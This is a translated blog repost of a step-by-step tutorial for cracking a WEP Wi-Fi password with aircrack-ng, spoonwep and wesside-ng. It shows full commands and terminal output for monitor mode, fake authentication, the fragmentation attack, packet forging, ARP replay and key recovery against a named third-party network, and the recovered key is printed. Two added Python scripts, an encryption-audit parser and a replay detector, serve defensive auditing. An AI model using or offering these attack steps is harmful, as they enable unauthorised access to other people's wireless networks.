Wireless password cracking
Source: Internet  Published by: 眼药水 知乎  Editor: 程序博客网  Time: 2024/04/29 12:17
The forum post is here: http://forum.ubuntu.org.cn/viewtopic.php?f=116&t=252764&start=0
1. Open a terminal and enter: ifconfig
You get the following result:
[root@Archlinux ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:A0:FF:21:BF
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:17
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1B:77:D8:63:0C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:303752 (296.6 Kb) TX bytes:179166 (174.9 Kb)
2. In the terminal enter: airmon-ng start wlan0
You get the following result:
[root@Archlinux ~]# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2013 NetworkManager
2017 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
3. In the terminal enter: kill 2013 2017 # kill the processes listed above that could cause trouble <# tested: you can get by without killing them!>
4. modprobe iwl3945 # the wireless driver shown in the result above
5. Open spoonwep and look up the channel of the wireless network you want to crack -> when spoonwep starts, a scan window pops up automatically; the number under the column labelled CH is the channel, usually 1, 6 or 11. What I scanned included the following (just one example; in practice the scan returns many):
BSSID PWR Beacons #Data ,#/s CH MB ENC CIPHER AUTH ESSID
AP'S MAC -83 197+ 133+ 0 6 54e wep wep dlink
BSSID STATION PWR Rate Lost Packets Probes
AP'S MAC mac -43 11e-1e 22+- 2000+ dlink
<This is only an example; the values will not necessarily be these, and some keep changing>
# AP'S MAC: here what I found was 00:24:01:C0:0B:F8 (the MAC address of the target being cracked / intruded)
# 197+ and 133+ mean these numbers keep increasing ## after cracking, when my roommate was using this network the Data count grew very fast, but before it was cracked it grew very slowly; this spot will change again in a moment
# The 6 under CH is the channel
# ENC is the encryption type, here WEP
# AUTH -> note that this changes later (I cannot explain the specifics, I am just a user)
# ESSID is the name of the wireless network (defined by its owner)
6. In the terminal: airmon-ng start mon0 6
··· step 2 gave the hint (monitor mode enabled on mon0); 6 is the channel number ···
You get the following result:
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
mon0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon1 Intel 3945ABG iwl3945 - [phy0]
7. Now start capturing packets (still in the terminal):
In the terminal enter: airodump-ng --ivs -w 333 -c 6 mon0
# note the two dashes before ivs;
"333" can be any name (it is used later);
-c 6 fixes the channel to 6; mon0 is the interface enabled and found above //
Note: after this you will see a result similar to the window spoonwep opened earlier. (Do not close this window)
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6 - 1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0 - 1 0 55
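The airodump-ng table above is the same data a defender uses for a wireless audit: every row whose ENC column reads WEP or OPN (and, to a lesser degree, WPA/TKIP) is a network that should be migrated to WPA2 or WPA3. The following Python script is an added example, not code from the original post or from the aircrack-ng project; it parses rows in the table format shown above (the sample table is copied from the page) and grades each access point. The column handling is an assumption based on the rows visible here: RXQ is present only when locked to a channel, and a lone "." may follow the MB column.

```python
"""Added audit helper: parse airodump-ng AP rows and flag weak encryption."""
import re
from collections import Counter
from dataclasses import dataclass

ENC_TOKENS = {"OPN", "WEP", "WPA", "WPA2", "WPA3"}
CIPHER_TOKENS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "GCMP", "WRAP"}
AUTH_TOKENS = {"PSK", "MGT", "SKA", "OPN", "SAE", "OWE"}
MAC_RE = re.compile(r"^[0-9A-F]{2}(?::[0-9A-F]{2}){5}$", re.I)

# Copied from the airodump-ng window shown in the post (AP rows plus the
# station rows and headers, which the parser must skip).
SAMPLE_TABLE = """\
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6 - 1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0 - 1 0 55
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    enc: str
    cipher: str
    auth: str
    essid: str


def parse_ap_row(line):
    """Parse one AP row; return None for headers, station rows and rows without ENC."""
    tokens = line.split()
    # AP rows start with a MAC followed by a numeric PWR; station rows have two MACs.
    if len(tokens) < 9 or not MAC_RE.match(tokens[0]) or MAC_RE.match(tokens[1]):
        return None
    enc_idx = next((i for i, t in enumerate(tokens) if i >= 6 and t in ENC_TOKENS), None)
    if enc_idx is None:
        return None
    # MB may be followed by a lone ".", which shifts the CH column by one (assumption).
    ch_idx = enc_idx - 3 if tokens[enc_idx - 1] == "." else enc_idx - 2
    rest = tokens[enc_idx + 1:]
    cipher = rest.pop(0) if rest and rest[0] in CIPHER_TOKENS else ""
    auth = rest.pop(0) if rest and rest[0] in AUTH_TOKENS else ""
    return AccessPoint(tokens[0], int(tokens[ch_idx]), tokens[enc_idx], cipher, auth, " ".join(rest))


def grade(ap):
    """Map the ENC/CIPHER columns to an audit grade."""
    if ap.enc == "OPN":
        return "open"      # no confidentiality at all
    if ap.enc == "WEP":
        return "broken"    # key recoverable from captured IVs, as the post demonstrates
    if ap.enc == "WPA" or ap.cipher == "TKIP":
        return "legacy"    # WPA/TKIP is deprecated; move to WPA2-CCMP or WPA3
    return "ok"


def audit(table_text):
    """Return (findings, summary): findings lists APs needing attention, summary counts all grades."""
    aps = [ap for ap in map(parse_ap_row, table_text.splitlines()) if ap]
    summary = Counter(grade(ap) for ap in aps)
    findings = [(ap.bssid, ap.essid, ap.channel, ap.enc, grade(ap)) for ap in aps if grade(ap) != "ok"]
    return findings, summary


if __name__ == "__main__":
    findings, summary = audit(SAMPLE_TABLE)
    print(dict(summary))
    for bssid, essid, ch, enc, verdict in findings:
        print(f"{bssid} ch{ch:<3} {enc:<5} {verdict:<7} {essid}")
```

Run against the table from the post, the script reports three WEP networks, three open networks and two WPA/TKIP networks; only the two WPA2-CCMP rows pass. Feeding it the CSV that airodump-ng writes alongside the .ivs file would need a different column split, so this parser targets the on-screen table only.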
8. In the terminal enter: aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
# here -e is followed by the AP's ESSID
-a is followed by the AP's BSSID, i.e. the AP's MAC address
-h is followed by your own MAC address
You get the following result:
[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
14:48:53 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
14:48:53 Sending Authentication Request (Open System) [ACK]
14:48:53 Authentication successful
14:48:53 Sending Association Request [ACK]
14:48:53 Association successful :-) (AID: 1)
At this point the window you left open, i.e. the airodump-ng window, changes noticeably (possibly)
If the change is obvious, then once the Data count grows past 10000 or so you can run the following command directly to crack:
_______________________________________________________________________________
[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs.
# Mine did not grow quickly (only 1412), so it failed here; continue below (it can still be cracked :-) Haste makes waste!
_________________________________________________________________________________________________________________
9. aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
15:07:10 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11 mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...
Size: 328, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:24:01:C0:0B:F8
0x0000: 0842 0000 0100 5e7f fffa 0024 01c0 0bf8 .B....^...$....
0x0010: 0024 01c0 0bf8 d066 327e 0200 df2e 869e .$.....f2~......
0x0020: ec2f 54f3 1607 352f b790 45f2 414d 03c2 ./T...5/..E.AM..
0x0030: b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4 ...J..........5.
0x0040: 8911 ad85 e45f ac37 cfff f38b dc41 a600 ....._.7.....A..
0x0050: 5b21 01cf 9838 d95c d6ef bedc b898 7ec6 [!...8./......~.
0x0060: 0491 4035 cf43 622d bdfb de72 6964 0299 ..@5.Cb-...rid..
0x0070: f2da f200 d5be c5c7 1a59 7e16 d081 078f .........Y~.....
0x0080: 8f26 3710 dce0 4cb9 5e32 f043 7108 672a .&7...L.^2.Cq.g*
0x0090: 3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d ?......F.:....-.
0x00a0: 1fa0 598a a787 36a0 8e5e ead1 abb8 96b1 ..Y...6..^......
0x00b0: a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f ..e%...3..?..|>/
0x00c0: 9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb .b.F....`.1-.D..
0x00d0: c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928 ..(....H......i(
--- CUT ---
Use this packet ?
Now choose y
Use this packet ? y
Saving chosen packet in replay_src-0111-150843.cap
15:09:17 Data packet found!
15:09:17 Sending fragmented packet
15:09:19 No answer, repeating...
15:09:19 Trying a LLC NULL packet
15:09:19 Sending fragmented packet
15:09:20 No answer, repeating...
15:09:20 Sending fragmented packet
15:09:22 No answer, repeating...
15:09:22 Trying a LLC NULL packet
15:09:22 Sending fragmented packet
15:09:23 No answer, repeating...
15:09:23 Sending fragmented packet
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 384 bytes of a keystream
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 1500 bytes of a keystream
15:09:23 Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#
Look at the key lines above:
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
(After entering y, the system started sending data; the airodump-ng window reacted immediately and the Data count started growing at once, so the following steps were no longer necessary: wait until Data reaches 15,000 and aircrack-ng gets the password.)
Keep reading below:
10. Enter ls to see the file names just created, so you can copy them in a moment :-)
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor
333-02.ivs Downloads replay_src-0111-150843.cap
[root@Archlinux ~]#
In the terminal enter: packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
You get:
[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
Wrote packet to: mrarp
11. aireplay-ng -2 -r mrarp -x 1024 mon1
# mon1 is used here; see for yourself why (aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets... it is mon1 here)
[root@Archlinux ~]# aireplay-ng -2 -r mrarp -x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:77:D8:63:0C)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1B:77:D8:63:0C
0x0000: 0841 0201 0024 01c0 0bf8 001b 77d8 630c .A...$......w.c.
0x0010: ffff ffff ffff 8001 437e 0200 769d a167 ........C~..v..g
0x0020: e1af 7926 ebca 352f b7cb 1002 53d7 59d3 ..y&..5/....S.Y.
0x0030: bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf .w...2.j...I..*.
0x0040: c256 37aa .V7.
Use this packet ?
Choose y
You get:
Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.
Now the Data count in the dump window shoots up
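What makes the Data counter "shoot up" is that aireplay-ng -2 -x 1024 re-injects the same captured 68-byte WEP frame (same IV 43:7e:02, same ciphertext) up to 1024 times a second, and the AP re-encrypts each reply with a fresh IV. A legitimate station never repeats an identical WEP frame at that rate, which is what a wireless IDS keys on. The Python detector below is an added example, not code from the original post or from any WIDS product: it flags any (source, BSSID, size, IV) fingerprint seen at least `threshold` times inside a sliding window. The frame records are constructed in the script (the BSSID, station MAC, frame size and IV are taken from the output shown on this page; the timing and the legitimate-traffic profile are assumptions).

```python
"""Added WIDS-style detector for WEP frame replay bursts (example, not from the post)."""
from collections import defaultdict, deque
from dataclasses import dataclass

BSSID = "00:24:01:C0:0B:F8"            # AP from the post
STATION = "00:22:FB:A4:DF:F4"          # a client seen in the airodump-ng station list
INJECTOR = "00:1B:77:D8:63:0C"         # adapter MAC used in the post
REPLAYED_IV = "437e02"                 # IV bytes at offset 0x18 of the 68-byte frame dump


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp in seconds
    src: str       # transmitter address
    bssid: str
    size: int      # frame length in bytes
    iv: str        # 3-byte WEP IV as hex, "" for non-WEP frames


def detect_replay(frames, window=1.0, threshold=50):
    """Return one alert per fingerprint that repeats >= threshold times within `window` seconds.

    Fingerprint = (src, bssid, size, iv). Under WEP each frame normally carries a new IV,
    so an identical fingerprint repeating at high rate indicates frame replay.
    """
    recent = defaultdict(deque)   # fingerprint -> timestamps inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        key = (f.src, f.bssid, f.size, f.iv)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"ts": f.ts, "src": f.src, "fingerprint": key, "count": len(q)})
    return alerts


def legitimate_traffic(seconds=5, pps=10):
    """Constructed baseline: one station at 10 frames/s, every frame with a fresh IV (assumption)."""
    return [Frame(ts=i / pps, src=STATION, bssid=BSSID, size=98, iv=f"{i:06x}")
            for i in range(seconds * pps)]


def constructed_capture():
    """Constructed capture: baseline traffic plus a burst of 300 identical frames at ~1000/s."""
    frames = legitimate_traffic()
    frames += [Frame(ts=2.0 + i / 1000, src=INJECTOR, bssid=BSSID, size=68, iv=REPLAYED_IV)
               for i in range(300)]
    return frames


if __name__ == "__main__":
    for alert in detect_replay(constructed_capture()):
        print(f"t={alert['ts']:.3f}s replay burst from {alert['src']}: "
              f"{alert['count']} identical frames (size {alert['fingerprint'][2]}, IV {alert['fingerprint'][3]})")
```

Only the injected burst triggers an alert; the baseline station, whose IV changes on every frame, never accumulates repeated fingerprints. The same rule also catches the fragmentation-attack retransmissions in step 9 if the threshold is lowered, at the cost of false positives from stations retrying on a lossy link, which is why the window and threshold are parameters rather than constants.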
12. Open another terminal and enter:
ls
You get:
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor replay_src-0111-150843.cap
333-02.ivs Downloads mrarp replay_src-0111-151709.cap
[root@Archlinux ~]#
Enter:
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs (it is 02 because I closed the capture window once, so ls shows two ivs files)
You get:
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs. (Wrong file: because I closed the airodump-ng window once and then ran that command again, which produced another ivs file)
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs # reason as above
Opening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.
Aircrack-ng 1.0
[00:00:00] Tested 154 keys (got 17607 IVs)
KB depth byte(vote)
0 0/ 1 15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
1 3/ 8 80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
2 1/ 3 BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
3 0/ 4 12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
4 0/ 2 06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)
KEY FOUND! [ 15:80:59:12:06 ]
Decrypted correctly: 100%
[root@Archlinux ~]#
That is the password. 8)
13. For those who have read this far:
Here is the best method:
Open the spoonwep client and find the MAC address and channel of the target
In the terminal enter the following command: wesside-ng -i mon0 -v <target MAC>
Finally, to stop capturing, enter:
sudo airmon-ng stop mon0